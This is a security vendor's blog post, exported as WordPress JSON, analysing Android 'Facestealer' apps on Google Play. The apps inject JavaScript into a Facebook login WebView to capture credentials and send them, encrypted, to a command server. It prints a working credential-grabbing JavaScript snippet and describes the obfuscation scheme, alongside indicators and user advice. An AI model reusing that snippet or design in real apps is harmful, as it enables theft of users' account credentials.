{"id":90617,"date":"2022-03-14T14:49:19","date_gmt":"2022-03-14T09:19:19","guid":{"rendered":"https:\/\/blogs.quickheal.com\/?p=90617"},"modified":"2023-02-15T15:08:28","modified_gmt":"2023-02-15T09:38:28","slug":"stay-alert-of-facebook-credential-stealer-applications-stealing-users-credentials","status":"publish","type":"post","link":"https:\/\/www.quickheal.com\/blogs\/stay-alert-of-facebook-credential-stealer-applications-stealing-users-credentials\/","title":{"rendered":"Stay Alert of Facebook Credential Stealer Applications Stealing User&#8217;s Credentials."},"content":{"rendered":"<p>Social media credentials are always a lucrative thing for threat actors. They use various techniques to get them. Some use overlays with fake user interfaces, some use key-logging, and some use simple social engineering to trap users. Another way threat actors have been used in the recent past is JavaScript code injection in WebView to steal Facebook credentials. The script directly <a href=\"https:\/\/blogs.quickheal.com\/can-facebook-account-misused-hacked\/\">hacked<\/a> the entered Facebook login credentials.<\/p>\n<p>In Jan 2022, Quick Heal Security Labs saw many Facebook credentials stealer applications on Google Play Store, which use different techniques to hide their JavaScript code. Android researchers named <a href=\"https:\/\/blogs.quickheal.com\/can-facebook-account-misused-hacked\/\">Facebook credential<\/a> stealer &#8220;<strong>Facestealer.<\/strong>&#8221;<\/p>\n<h2 style=\"font-size: 27px;\"><strong>How dangerous is this?<\/strong><\/h2>\n<p>In case of successful harvesting of Facebook credentials, the hacker gets access to the user&#8217;s personal information like personals details, friend lists, relation details, activities, private posts &amp; messages, Photo\/Videos, life events, etc. and perform malicious activities such as hackers can<\/p>\n<ul>\n<li><span class=\"TextRun SCXW92401478 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW92401478 BCX0\">I<\/span><span class=\"NormalTextRun SCXW92401478 BCX0\">mpersonate to <\/span><span class=\"NormalTextRun SCXW92401478 BCX0\">be a real<\/span><span class=\"NormalTextRun SCXW92401478 BCX0\"> user &amp; use this data for malicious activities like phishing &amp; Spoofing.<\/span><\/span><span class=\"EOP SCXW92401478 BCX0\" data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/li>\n<li>Use the compromised accounts to distribute spam messages, malicious links, malware files, etc.<\/li>\n<li>Blackmail the victim user with collected private sensitive data for financial or other benefits.<\/li>\n<li>Spoil the victim&#8217;s social reputation.<\/li>\n<li>Change the victim&#8217;s personal details.<\/li>\n<li><span class=\"NormalTextRun SCXW8898501 BCX0\">Post <\/span><span class=\"NormalTextRun SCXW8898501 BCX0\">unwanted <\/span><span class=\"NormalTextRun SCXW8898501 BCX0\">posts.<\/span><\/li>\n<li>Compromise victims&#8217; other social media and professional accounts using the collected information.<\/li>\n<\/ul>\n<p>So, losing Facebook credentials to hackers can be very dangerous, as it could lead to several unforeseen consequences.<\/p>\n<h2 style=\"font-size: 27px;\"><strong>What Did Quick Heal Security Do For This?<\/strong><\/h2>\n<p>The Quick Heal Security Labs have reported the following applications to Google Play Store, and Google has taken prompt action (see Fig. 2) and removed these applications from Google Play Store.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90618 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_1_img-300x69.png\" alt=\"\" width=\"618\" height=\"142\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_1_img-300x69.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_1_img-650x149.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_1_img-768x176.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_1_img-789x181.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_1_img.png 1108w\" sizes=\"(max-width: 618px) 100vw, 618px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 1. Reported applications from Google Play Store with its download count<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90619 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_2_google_reply-300x228.png\" alt=\"\" width=\"730\" height=\"555\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_2_google_reply-300x228.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_2_google_reply-513x390.png 513w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_2_google_reply-768x583.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_2_google_reply-789x599.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_2_google_reply.png 1332w\" sizes=\"(max-width: 730px) 100vw, 730px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 2. Mail about application report to Google and Google&#8217;s confirmation<\/p>\n<p><strong>Below is a technical analysis of these applications:<\/strong><\/p>\n<p>Technical Analysis:<\/p>\n<p><strong>#1. Application Name:<\/strong> PicsArt<\/p>\n<p><strong>MD5<\/strong>: db95ae3cc6697bc9169fc9d6566a97bc<\/p>\n<p>This application used various string encryptions to avoid AV engine detection and made analysis difficult for researchers.<\/p>\n<p>This application:<\/p>\n<ul>\n<li>Opens with a Picsart screen (shown in the middle).<\/li>\n<li><span class=\"TextRun SCXW211314447 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW211314447 BCX0\">Then re<\/span><span class=\"NormalTextRun SCXW211314447 BCX0\">directs it to the next page, asking for Facebook credentials. <\/span><\/span><span class=\"EOP SCXW211314447 BCX0\" data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90620 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_3_Pic-300x215.png\" alt=\"\" width=\"654\" height=\"468\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_3_Pic-300x215.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_3_Pic-545x390.png 545w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_3_Pic-768x550.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_3_Pic-1536x1099.png 1536w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_3_Pic-789x565.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_3_Pic.png 1632w\" sizes=\"(max-width: 654px) 100vw, 654px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 3. Application launch and ask for Facebook credentials<\/p>\n<p>But in the background, this application makes a request to the URL &#8211; hxxps[:]\/\/mago[.]qfoster[.]shop\/PHP\/submit\/data.<\/p>\n<p>Fig. 4. shows the code executed by the application to make this request.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90621 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_4_First_req_code-300x32.png\" alt=\"\" width=\"806\" height=\"86\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_4_First_req_code-300x32.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_4_First_req_code-650x69.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_4_First_req_code-768x81.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_4_First_req_code-789x84.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_4_First_req_code.png 1094w\" sizes=\"(max-width: 806px) 100vw, 806px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 4. Code for the above request<\/p>\n<p>And application gets the encrypted response which is shown in Fig. 5<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90622 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_5_received_res-300x133.png\" alt=\"\" width=\"812\" height=\"360\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_5_received_res-300x133.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_5_received_res-650x287.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_5_received_res-768x339.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_5_received_res-789x349.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_5_received_res.png 1102w\" sizes=\"(max-width: 812px) 100vw, 812px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 5. Response from c2 for application&#8217;s request<\/p>\n<p>Received encrypted data is decrypted by application which is shown in Fig.6.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90624 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_6_response_decryption_flow-197x300.png\" alt=\"\" width=\"551\" height=\"839\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_6_response_decryption_flow-197x300.png 197w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_6_response_decryption_flow-256x390.png 256w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_6_response_decryption_flow.png 566w\" sizes=\"(max-width: 551px) 100vw, 551px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 6. Decryption flow for response data<\/p>\n<p>The application uses DES\/CBC encryption followed by Base64 to get intermediate data for this encryption purpose. Then AES\/CBC encryption is followed by Base64 to get a final decrypted response.<\/p>\n<p>Fig. 7 shows the final decrypted output of this process. This decrypted data is used by applications for further processes.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90625 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_7_dycrypted_response-300x178.png\" alt=\"\" width=\"724\" height=\"430\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_7_dycrypted_response-300x178.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_7_dycrypted_response-650x385.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_7_dycrypted_response-768x455.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_7_dycrypted_response-789x467.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_7_dycrypted_response.png 1300w\" sizes=\"(max-width: 724px) 100vw, 724px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 7. Final decrypted response data<\/p>\n<p>The application saves this decrypted data in the SharedPreference file, i.e. <strong>x86m.xml,<\/strong> for future use.<\/p>\n<p>Check Fig. 8. where data of x86m.xml is shown.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90626 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_8_x86_xml-300x51.png\" alt=\"\" width=\"651\" height=\"111\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_8_x86_xml-300x51.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_8_x86_xml-650x111.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_8_x86_xml-768x131.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_8_x86_xml-789x135.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_8_x86_xml.png 856w\" sizes=\"(max-width: 651px) 100vw, 651px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 8. SharedPreference File x86m.xml data<\/p>\n<p>Now, the application uses these values to get the Facebook URL value and JavaScript injection code.<\/p>\n<p>Here functions C0151a.m855b() gives values from shared preference file \u201cx86m.xml\u201d then these values are decrypted by C0152a.m930a() function-<\/p>\n<p><strong>javascript:window.assi.showAsd(document.getElementById(&#8216;m_login_email&#8217;).value,document.getElementById(&#8216;m_login_password&#8217;).value);\u00a0<\/strong><\/p>\n<p>Fig. 9 shows this, which decrypts Facebook URL values, JavaScript injection code, and execution it deploys.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90627 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_9_Javascrypt_dec_url_dec_JS_injection_code-300x128.png\" alt=\"\" width=\"757\" height=\"323\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_9_Javascrypt_dec_url_dec_JS_injection_code-300x128.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_9_Javascrypt_dec_url_dec_JS_injection_code-650x278.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_9_Javascrypt_dec_url_dec_JS_injection_code-768x329.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_9_Javascrypt_dec_url_dec_JS_injection_code-789x337.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_9_Javascrypt_dec_url_dec_JS_injection_code.png 858w\" sizes=\"(max-width: 757px) 100vw, 757px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 9. Code for opening official Facebook page and JavaScript injection<\/p>\n<p>Fig. 10. gives the flow of decryption of this data. It takes the value of the &#8220;desc&#8221; key from the shared preference file. Then it uses AES\/ECB encryption two times, followed by Base64 decryption to get the final decrypted JS code.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90628 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_10_JS_code_decryption_flow-300x253.png\" alt=\"\" width=\"600\" height=\"506\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_10_JS_code_decryption_flow-300x253.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_10_JS_code_decryption_flow-463x390.png 463w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_10_JS_code_decryption_flow.png 567w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 10. JavaScript injection code decryption flow<\/p>\n<p>To get Facebook URL decryption function is called inside the webview.loadurl() function.<\/p>\n<p>In this decryption function:<\/p>\n<ul>\n<li>It takes the value of the &#8220;private&#8221; key from the shared preference file<\/li>\n<li>Then it uses AES\/ECB decryption followed by Base64 to get intermediate data<\/li>\n<li>Then DES\/CBC followed by Base64 to get second intermediate data<\/li>\n<li>Then AES\/ECB followed by Base64 to get the final URL value<\/li>\n<\/ul>\n<p>The above steps are explained in Fig. 11.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90629 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_11_FB_url_decryption_flow-184x300.png\" alt=\"\" width=\"637\" height=\"1038\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_11_FB_url_decryption_flow-184x300.png 184w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_11_FB_url_decryption_flow-240x390.png 240w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_11_FB_url_decryption_flow.png 561w\" sizes=\"(max-width: 637px) 100vw, 637px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 11. Facebook URL decryption Flow<\/p>\n<p>After this, &#8220;ShowAsd&#8221; is the function called from JavaScript code.<\/p>\n<p>This function takes the values and stores them in one of the shared preference files \u2013 &#8220;FILE_KPx86m&#8221;, as shown in Fig.12<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90630 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_12_js_fn_puting_stolen_data_in_xml-1-300x85.png\" alt=\"\" width=\"576\" height=\"163\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_12_js_fn_puting_stolen_data_in_xml-1-300x85.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_12_js_fn_puting_stolen_data_in_xml-1.png 556w\" sizes=\"(max-width: 576px) 100vw, 576px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 12. Code which keeps collected information in one file<\/p>\n<p>Below code (Fig.13.) is preparing collected data for submission.<\/p>\n<ul>\n<li>It takes data from the FILE_KPx86m file<\/li>\n<li>Then it first encrypts it with AES\/CBC<\/li>\n<li>Then with DES\/ECB.<\/li>\n<li>Then it sends this encrypted data to the C&amp;C server<\/li>\n<\/ul>\n<p>Fig. 14 explains this code.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90631 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_13_encr_jsonobj-300x195.png\" alt=\"\" width=\"621\" height=\"404\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_13_encr_jsonobj-300x195.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_13_encr_jsonobj-599x390.png 599w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_13_encr_jsonobj.png 657w\" sizes=\"(max-width: 621px) 100vw, 621px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 13. Encrypting collected data<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90632 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_14_posturl-300x58.png\" alt=\"\" width=\"720\" height=\"139\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_14_posturl-300x58.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_14_posturl.png 898w\" sizes=\"(max-width: 720px) 100vw, 720px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 14. Posting collected data to c2<\/p>\n<p><strong>#2. Application name:<\/strong> smart scanner<\/p>\n<p><strong>MD5<\/strong>: 38a72e3b36c4b44bf22c0ce78ec668d1<\/p>\n<p>The second application, i.e. smart scanner, which we have reported, is relatively less complex.<\/p>\n<p>This application opens with a smart scanner default screen (shown in the middle of the image). After clicking the login with Facebook button, it opens the third screen, asking a user to log in with Facebook credentials.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90633 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_15_smart_scanner-300x212.png\" alt=\"\" width=\"530\" height=\"374\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_15_smart_scanner-300x212.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_15_smart_scanner-551x390.png 551w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_15_smart_scanner-768x544.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_15_smart_scanner-1536x1088.png 1536w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_15_smart_scanner.png 1644w\" sizes=\"(max-width: 530px) 100vw, 530px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 15. Smart scanner application Launch<\/p>\n<p>This application is comparatively less encrypted than the above application.<\/p>\n<p>As shown in the first part of Fig. 16,<\/p>\n<ul>\n<li>The application opens the official Facebook page.<\/li>\n<li>Here it adds a JavaScript interface with the name &#8220;jshandler.&#8221;<\/li>\n<li>In part 2, we can see the JavaScript code to get email and password values.<\/li>\n<li>In part 3, it creates a JSON object with this data,<\/li>\n<li>In part 4, it sends it to c2.<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90634 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_16_malicious_code-261x300.png\" alt=\"\" width=\"705\" height=\"810\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_16_malicious_code-261x300.png 261w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_16_malicious_code-340x390.png 340w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_16_malicious_code-768x882.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_16_malicious_code-789x906.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_16_malicious_code.png 996w\" sizes=\"(max-width: 705px) 100vw, 705px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 16. Application malicious code<\/p>\n<p><strong>IOCs:<\/strong><\/p>\n<p>Quick Heal Security Labs detect these apps with variants of Android. Facestealer<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90638 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/17_IOC_list-300x60.png\" alt=\"\" width=\"715\" height=\"143\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/17_IOC_list-300x60.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/17_IOC_list-650x131.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/17_IOC_list.png 696w\" sizes=\"(max-width: 715px) 100vw, 715px\" \/><\/p>\n<p>Social media credentials theft is not seen as a severe issue as financial credentials theft. As we stated earlier, this is a challenging issue, and users should understand the problem involved.<br \/>\nMalware authors spread these malware applications on the Google Play Store in photo editing applications, pdf applications. Users easily download these types of applications without giving much thought. Users should avoid logging in using social media for such kinds of applications.<\/p>\n<h2 style=\"font-size: 27px;\"><span class=\"TextRun SCXW105407393 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW105407393 BCX0\"><strong>How can users secure their Facebook account?<\/strong><\/span><\/span><\/h2>\n<p>Users should use features provided by Facebook to secure their account, such as<\/p>\n<ul>\n<li><a href=\"https:\/\/www.facebook.com\/help\/148233965247823\">Two-factor authentication<\/a><\/li>\n<li><a href=\"https:\/\/www.facebook.com\/help\/213343062033160\">Trusted contacts\u00a0<\/a><\/li>\n<\/ul>\n<p>These features may help users to avoid getting hacked by hackers.<\/p>\n<p>Quick Heal Security Lab continuously checks applications from Google Play Store for such malware.<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Social media credentials are always a lucrative thing for threat actors. They use various techniques to get them. Some use overlays with fake user interfaces, some use key-logging, and some use simple social engineering to trap users. Another way threat actors have been used in the recent past is JavaScript code injection in WebView to [&hellip;]<\/p>\n","protected":false},"author":61,"featured_media":90663,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[55,41],"tags":[431,1891,901,534,282,1892,1890,49],"class_list":["post-90617","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-android","category-facebook","tag-android","tag-credentialstealer","tag-cyberattack","tag-cybersecurity","tag-facebook-2","tag-facestealer","tag-googleplay","tag-malware"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/90617"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/61"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=90617"}],"version-history":[{"count":30,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/90617\/revisions"}],"predecessor-version":[{"id":91414,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/90617\/revisions\/91414"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media\/90663"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=90617"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/categories?post=90617"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/tags?post=90617"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}